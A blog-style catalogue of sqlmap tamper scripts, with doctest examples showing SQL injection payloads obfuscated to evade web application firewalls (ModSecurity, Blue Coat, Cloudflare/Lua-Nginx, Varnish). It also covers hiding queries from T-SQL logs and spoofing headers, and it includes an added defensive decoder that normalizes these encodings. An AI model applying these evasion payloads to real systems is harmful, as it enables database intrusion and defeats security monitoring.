sqlmap tamper script roundup

admin, 2022-10-20 13:32:58

I've been going through the tamper scripts recently and found it hard to locate the one I wanted, so I organized them and am sharing the list with everyone.




Replacements

Replacing single quotes

1. apostrophemask.py: replaces the single-quote character with its UTF-8 full-width counterpart

"Replaces apostrophe character with its UTF-8 full width counterpart"

The apostrophe ' becomes %EF%BC%87

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

2. apostrophenullencode.py: replaces the single-quote character with its illegal double-byte unicode counterpart

"Replaces apostrophe character with its illegal double unicode counterpart"

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

Replacing UNION

57. dunion.py: replaces ' UNION' (the space before UNION included) with 'DUNION'

"Replaces instances of <int> UNION with <int>DUNION"

https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

>>> tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'

64. misunion.py: replaces ' UNION' with '-.1UNION'

"Replaces instances of UNION with -.1UNION"

https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf

>>> tamper('1 UNION ALL SELECT')
'1-.1UNION ALL SELECT'

52. 0eunion.py: replaces ' UNION' with 'e0UNION'

"Replaces instances of <int> UNION with <int>e0UNION"

>>> tamper('1 UNION ALL SELECT')
'1e0UNION ALL SELECT'

45. unionalltounion.py: replaces 'UNION ALL SELECT' with 'UNION SELECT'

"Replaces UNION ALL SELECT with UNION SELECT"

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'

Replacing operators

Replacing =

13. equaltolike.py: replaces every equals operator ('=') with the LIKE operator

"Replaces all occurrences of operator equal ('=') with operator 'LIKE'"

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

58. equaltorlike.py: replaces every equals operator ('=') with the RLIKE operator

"Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart"

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'

Replacing +

27. plus2concat.py: replaces the plus ('+') character with the CONCAT() function

"Replaces plus ('+') character with function CONCAT()"

>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

28. plus2fnconcat.py: replaces the plus ('+') character with the ODBC function {fn CONCAT()}

"Replaces plus ('+') character with ODBC function {fn CONCAT()}"

https://msdn.microsoft.com/en-us/library/bb630290.aspx

>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

Replacing > and logical operators

15. greatest.py: replaces the greater-than operator ('>') with GREATEST

"Replaces greater than operator ('>') with 'GREATEST' counterpart"

GREATEST is a SQL function, so this works against most databases

>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

62. least.py: replaces the greater-than operator ('>') with LEAST

"Replaces greater than operator ('>') with 'LEAST' counterpart"

>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'

44. symboliclogical.py: replaces the logical operators AND and OR with their symbolic counterparts (&& and ||)

"Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)"

re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))

>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"

Replacing spaces

33. space2comment.py: replaces the space character (' ') with the comment '/**/'

"Replaces space character (' ') with comments '/**/'"

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'

34. space2dash.py: replaces the space character with a dash comment ('--') followed by a random string and a newline

"Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')"

Used during the ZeroNights SQL injection challenge

https://proton.onsec.ru/contest/

>>> tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'

35. space2hash.py: replaces the space character with a pound character ('#') followed by a random string and a newline

"Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')"

Used during the ModSecurity SQL injection challenge

http://modsecurity.org/demo/challenge.html

>>> tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'

36. space2morecomment.py: replaces the space character with the comment '/**_**/'

"Replaces space character (' ') with comments '/**_**/'"

>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'

37. space2morehash.py: replaces the space character with a pound character ('#') followed by a random string and a newline

"Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')"

Targets MySQL >= 5.1.13, a newer range than space2hash (MySQL 4.0, 5.0)

>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'

38. space2mssqlblank.py: (MsSQL) replaces the space character with a random blank character from a valid set of alternate characters

"Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters"

blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')

>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'

39. space2mssqlhash.py: replaces the space character with a pound character ('#') followed by a newline

"Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')"

>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

40. space2mysqlblank.py: (MySQL) replaces the space character with a random blank character from a valid set of alternate characters

"Replaces space character (' ') with a random blank character from a valid set of alternate characters"

blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')

>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'

41. space2mysqldash.py: replaces the space character with a dash comment ('--') followed by a newline

"Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')"

>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

42. space2plus.py: replaces the space character with a plus ('+')

"Replaces space character (' ') with plus ('+')"

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'

43. space2randomblank.py: replaces the space character with a random blank character from a valid set of alternate characters [most databases]

"Replaces space character (' ') with a random blank character from a valid set of alternate characters"

blanks = ("%09", "%0A", "%0C", "%0D")

>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'

46. unmagicquotes.py: replaces the quote character (') with the multi-byte combination %bf%27, with a generic comment appended at the end

"Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)"

http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

Bypasses magic_quotes/addslashes

>>> tamper("1' AND 1=1")
'1%bf%27-- -'


Replacing functions

11. commalessmid.py: replaces 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

"Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'"

>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'


12. concat2concatws.py: replaces 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

"Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'"

Bypasses firewalls that filter the CONCAT function

>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

61. ifnull2casewhenisnull.py: replaces 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END'

"Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart"

>>> tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'

18. ifnull2ifisnull.py: replaces 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

"Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'"

>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

65. ord2ascii.py: replaces ORD() calls with equivalent ASCII() calls

"Replaces ORD() occurrences with equivalent ASCII() calls"

>>> tamper("ORD('42')")
"ASCII('42')"

69. substring2leftright.py: replaces (PostgreSQL) SUBSTRING with LEFT and RIGHT

"Replaces PostgreSQL SUBSTRING with LEFT and RIGHT"

>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'

68. sleep2getlock.py: replaces SLEEP(5) with GET_LOCK('%s',5), where %s is a random name

"Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)""

https://zhuanlan.zhihu.com/p/35245598

Bypasses filters on the SLEEP() and BENCHMARK() functions

>>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
True

Other replacements

59. hex2char.py: replaces each (MySQL) 0x<hex>-encoded string with an equivalent CONCAT(CHAR(),...) expression

"Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart"

>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'

24. nonrecursivereplacement.py: replaces predefined SQL keywords with representations that survive non-recursive replacement filters (e.g. .replace("SELECT", ""))

"Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters"

10. commalesslimit.py: replaces 'LIMIT M, N' with 'LIMIT N OFFSET M'

"Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'"

>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'

Combined replacements

5. between.py: replaces '>' with 'NOT BETWEEN 0 AND #' and '=' with 'BETWEEN # AND #'

"Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'"
"Replaces equals operator ('=') with 'BETWEEN # AND #'"

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'

6. bluecoat.py: replaces the space after a SQL statement with a valid random blank character, then replaces '=' with the LIKE operator

"Replaces space character after SQL statement with a valid random blank character. Afterwards replace character = with LIKE operator"

https://kb.bluecoat.com/index?page=content&id=FAQ2147

Useful for bypassing the recommended WAF rule configuration for Blue Coat

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

Encoding

3. appendnullbyte.py: appends an encoded NULL byte to the end of the payload

"Appends encoded NULL byte character at the end of payload"

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

4. base64encode.py: Base64-encodes the payload

"Base64 all characters in a given payload"

>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

7. chardoubleencode.py: double URL-encodes all characters in the payload (not processing already-encoded ones)

"Double url-encodes all characters in a given payload (not processing already encoded)"

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

8. charencode.py: URL-encodes all characters in the payload (not processing already-encoded ones)

"Url-encodes all characters in a given payload (not processing already encoded)"

Useful for bypassing very weak web application firewalls that do not URL-decode the request before running it through their rule set

The web server URL-decodes it anyway, so it should work against any DBMS

>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

9. charunicodeencode.py: Unicode-URL-encodes the non-encoded characters in the payload (not processing already-encoded ones)

"Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)"

>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

54. charunicodeescape.py: Unicode-escapes the non-encoded characters in the payload (not processing already-encoded ones)

"Unicode-escapes non-encoded characters in a given payload (not processing already encoded)"

Effective against weak filters for AND/OR in JSON bodies

>>> tamper('SELECT FIELD FROM TABLE')
'\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054\\u0020\\u0046\\u0049\\u0045\\u004C\\u0044\\u0020\\u0046\\u0052\\u004F\\u004D\\u0020\\u0054\\u0041\\u0042\\u004C\\u0045'

56. decentities.py: HTML-encodes all characters as decimal entities (using code points)

"HTML encode in decimal (using code points) all characters"

>>> tamper("1' AND SLEEP(5)#")
'&#49;&#39;&#32;&#65;&#78;&#68;&#32;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#35;'

60. hexentities.py: HTML-encodes all characters as hexadecimal entities (using code points)

>>> tamper("1' AND SLEEP(5)#")
'&#x31;&#x27;&#x20;&#x41;&#x4e;&#x44;&#x20;&#x53;&#x4c;&#x45;&#x45;&#x50;&#x28;&#x35;&#x29;&#x23;'

17. htmlencode.py: HTML-encodes all non-alphanumeric characters (using code points)

"HTML encode (using code points) all non-alphanumeric characters"

>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
>>> tamper("1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

66. overlongutf8more.py: converts all characters in the payload to overlong UTF-8 (not processing already-encoded ones)

"Converts all characters in a given payload to overlong UTF8 (not processing already encoded)"

* https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/

* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/

>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

25. overlongutf8.py: converts the characters in the payload to overlong UTF-8 (not processing already-encoded ones)

"Converts all characters in a given payload (not processing already encoded)"

>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
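The encoding scripts in this section all rely on the same gap: a filter that matches on the literal bytes it receives, while the web server, the JSON parser or the database driver decodes one more layer before the query is executed. The defensive counterpart is to decode to a canonical form first and match second. The following is an added example written for this roundup (not code from the article or from sqlmap) that peels the layers listed above, using the tampered outputs quoted in this section as constructed test vectors; `normalize_encoding`, `_peel_once`, `decode_overlong_utf8` and the `SAMPLES` table are names chosen here. Base64 (base64encode.py) is deliberately not attempted, because base64-decoding every parameter blindly would mangle legitimate values; that step has to be tied to the parameters that actually carry base64.

```python
import html
import re
from urllib.parse import unquote_to_bytes

# Constructed test vectors: the tampered outputs quoted in this section.
SAMPLES = {
    "apostrophemask":   "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "apostrophenull":   "1 AND %00%271%00%27=%00%271",
    "chardoubleencode": "%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545",
    "charunicode":      "%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045",
    "unicodeescape":    r"\u0053\u0045\u004C\u0045\u0043\u0054\u0020\u0046\u0049\u0045\u004C\u0044\u0020\u0046\u0052\u004F\u004D\u0020\u0054\u0041\u0042\u004C\u0045",
    "decentities":      "&#49;&#39;&#32;&#65;&#78;&#68;&#32;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#35;",
    "hexentities":      "&#x31;&#x27;&#x20;&#x41;&#x4e;&#x44;&#x20;&#x53;&#x4c;&#x45;&#x45;&#x50;&#x28;&#x35;&#x29;&#x23;",
    "overlongutf8":     "SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1",
    "percentage":       "%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E",
}

FULLWIDTH_APOSTROPHE = "\uff07"  # U+FF07, sent as %EF%BC%87 by apostrophemask.py


def decode_overlong_utf8(data: bytes) -> bytes:
    """Map two-byte overlong sequences (lead byte C0/C1) back to ASCII.

    C0/C1 can never start a valid UTF-8 sequence, so a strict decoder replaces
    or drops them and a signature never sees the letters, while a lenient
    backend may still accept them.  All other bytes pass through untouched."""
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def _peel_once(text: str) -> str:
    """Remove one layer of each encoding family."""
    # %uXXXX (charunicodeencode.py) and \uXXXX (charunicodeescape.py)
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    # &#NN; and &#xNN; entities (decentities.py, hexentities.py, htmlencode.py)
    text = html.unescape(text)
    # one layer of %XX, then overlong bytes (charencode.py, overlongutf8*.py);
    # the second layer of chardoubleencode.py is handled by the next round
    raw = decode_overlong_utf8(unquote_to_bytes(text))
    text = raw.decode("utf-8", errors="replace")
    # percentage.py relies on the backend (ASP) discarding a '%' that is not
    # followed by two hex digits; mirror that so the keyword becomes visible
    text = re.sub(r"%(?![0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4})", "", text)
    # apostrophemask.py, apostrophenullencode.py, appendnullbyte.py
    return text.replace(FULLWIDTH_APOSTROPHE, "'").replace("\x00", "")


def normalize_encoding(payload: str, max_rounds: int = 3) -> str:
    """Peel encoding layers until the text stops changing.

    The round count is bounded so that a deliberately deep encoding cannot
    turn the normalizer itself into a CPU sink."""
    text = payload
    for _ in range(max_rounds):
        peeled = _peel_once(text)
        if peeled == text:
            break
        text = peeled
    return text


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:18} -> {normalize_encoding(sample)!r}")
```

Each round peels one layer, so the double-encoded sample needs two rounds and a third round confirms the fixed point; the bound on rounds is what keeps a maliciously deep encoding from becoming a denial of service against the filter.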

Case

20. lowercase.py: replaces each keyword character with its lowercase value

"Replaces each keyword character with lower case value"

Bypasses poorly written, permissive regular expressions

>>> tamper('INSERT')
'insert'

47. uppercase.py: replaces each keyword character with its uppercase value

"Replaces each keyword character with upper case value"

>>> tamper('insert')
'INSERT'

29. randomcase.py: randomizes the case of each keyword character

"Replaces each keyword character with random case value"

>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'

Additions

Adding comments

55. commentbeforeparentheses.py: prepends an inline comment before parentheses

"Prepends (inline) comment before parentheses"

Bypasses web application firewalls that block function calls

>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'

16. halfversionedmorekeywords.py: adds a versioned MySQL comment before each keyword

"Adds versioned MySQL comment before each keyword"

Used during the ModSecurity SQL injection challenge

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

19. informationschemacomment.py: adds a comment to the end of every occurrence of the (blacklisted) "information_schema" identifier

"Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier"

>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

21. modsecurityversioned.py: wraps the complete query in a versioned comment

"Embraces complete query with versioned comment"

Bypasses the ModSecurity WAF

>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'

22. modsecurityzeroversioned.py: wraps the complete query in a zero-versioned comment

"Embraces complete query with zero-versioned comment"

Bypasses the ModSecurity WAF

>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'

30. randomcomments.py: inserts random comments into SQL keywords

"Add random comments to SQL keywords"

>>> tamper('INSERT')
'I/**/NS/**/ERT'

49. versionedkeywords.py: encloses each non-function keyword in a versioned MySQL comment

"Encloses each non-function keyword with versioned MySQL comment"

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'

50. versionedmorekeywords.py: encloses each keyword in a versioned MySQL comment

"Encloses each keyword with versioned MySQL comment"

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

Other additions

14. escapequotes.py: adds a backslash before single and double quotes

"Slash escape quotes (' and ")"

>>> tamper('1" AND SLEEP(5)#')
'1\\" AND SLEEP(5)#'

23. multiplespaces.py: adds multiple spaces around SQL keywords

"Adds multiple spaces around SQL keywords"

https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'

26. percentage.py: adds a percent sign ('%') in front of each character

"Adds a percentage sign ('%') in front of each character"

>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'

31. securesphere.py: appends a specially crafted string

"Appends special crafted string"

67. schemasplit.py: splits FROM schema identifiers with whitespace (e.g. 'testdb 9.e.users')

"Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')"

>>> tamper('SELECT id FROM testdb.users')
'SELECT id FROM testdb 9.e.users'

32. sp_password.py: appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

"Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs"

* Appending sp_password to the end of the query hides it from T-SQL logs (a side effect of a T-SQL logging security measure)

http://websec.ca/kb/sql_injection

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

53. binary.py: injects the keyword 'binary' where possible

"Injects keyword binary where possible"

>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'

WAF bypass

63. luanginx.py: LUA-Nginx WAF bypass (e.g. Cloudflare)

"LUA-Nginx WAFs Bypass (e.g. Cloudflare)"

https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/

Lua-Nginx WAFs do not process more than 100 parameters

>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
'34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=
&1 AND 2>1'

48. varnish.py: appends an HTTP header 'X-originating-IP' to bypass the WAF

"Append a HTTP header 'X-originating-IP' to bypass WAF Protection of Varnish Firewall"

* https://web.archive.org/web/20160815052159/http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

   >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
   >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
   >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
   >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
   >> X-remote-IP: * or %00 or %0A

51. xforwardedfor.py: appends a fake HTTP header 'X-Forwarded-For' to bypass the WAF

"Append a fake HTTP header 'X-Forwarded-For' to bypass WAF (usually application based) protection"

# Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection
headers["Via"] = "1.1 Chrome-Compression-Proxy"

# Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007
headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]
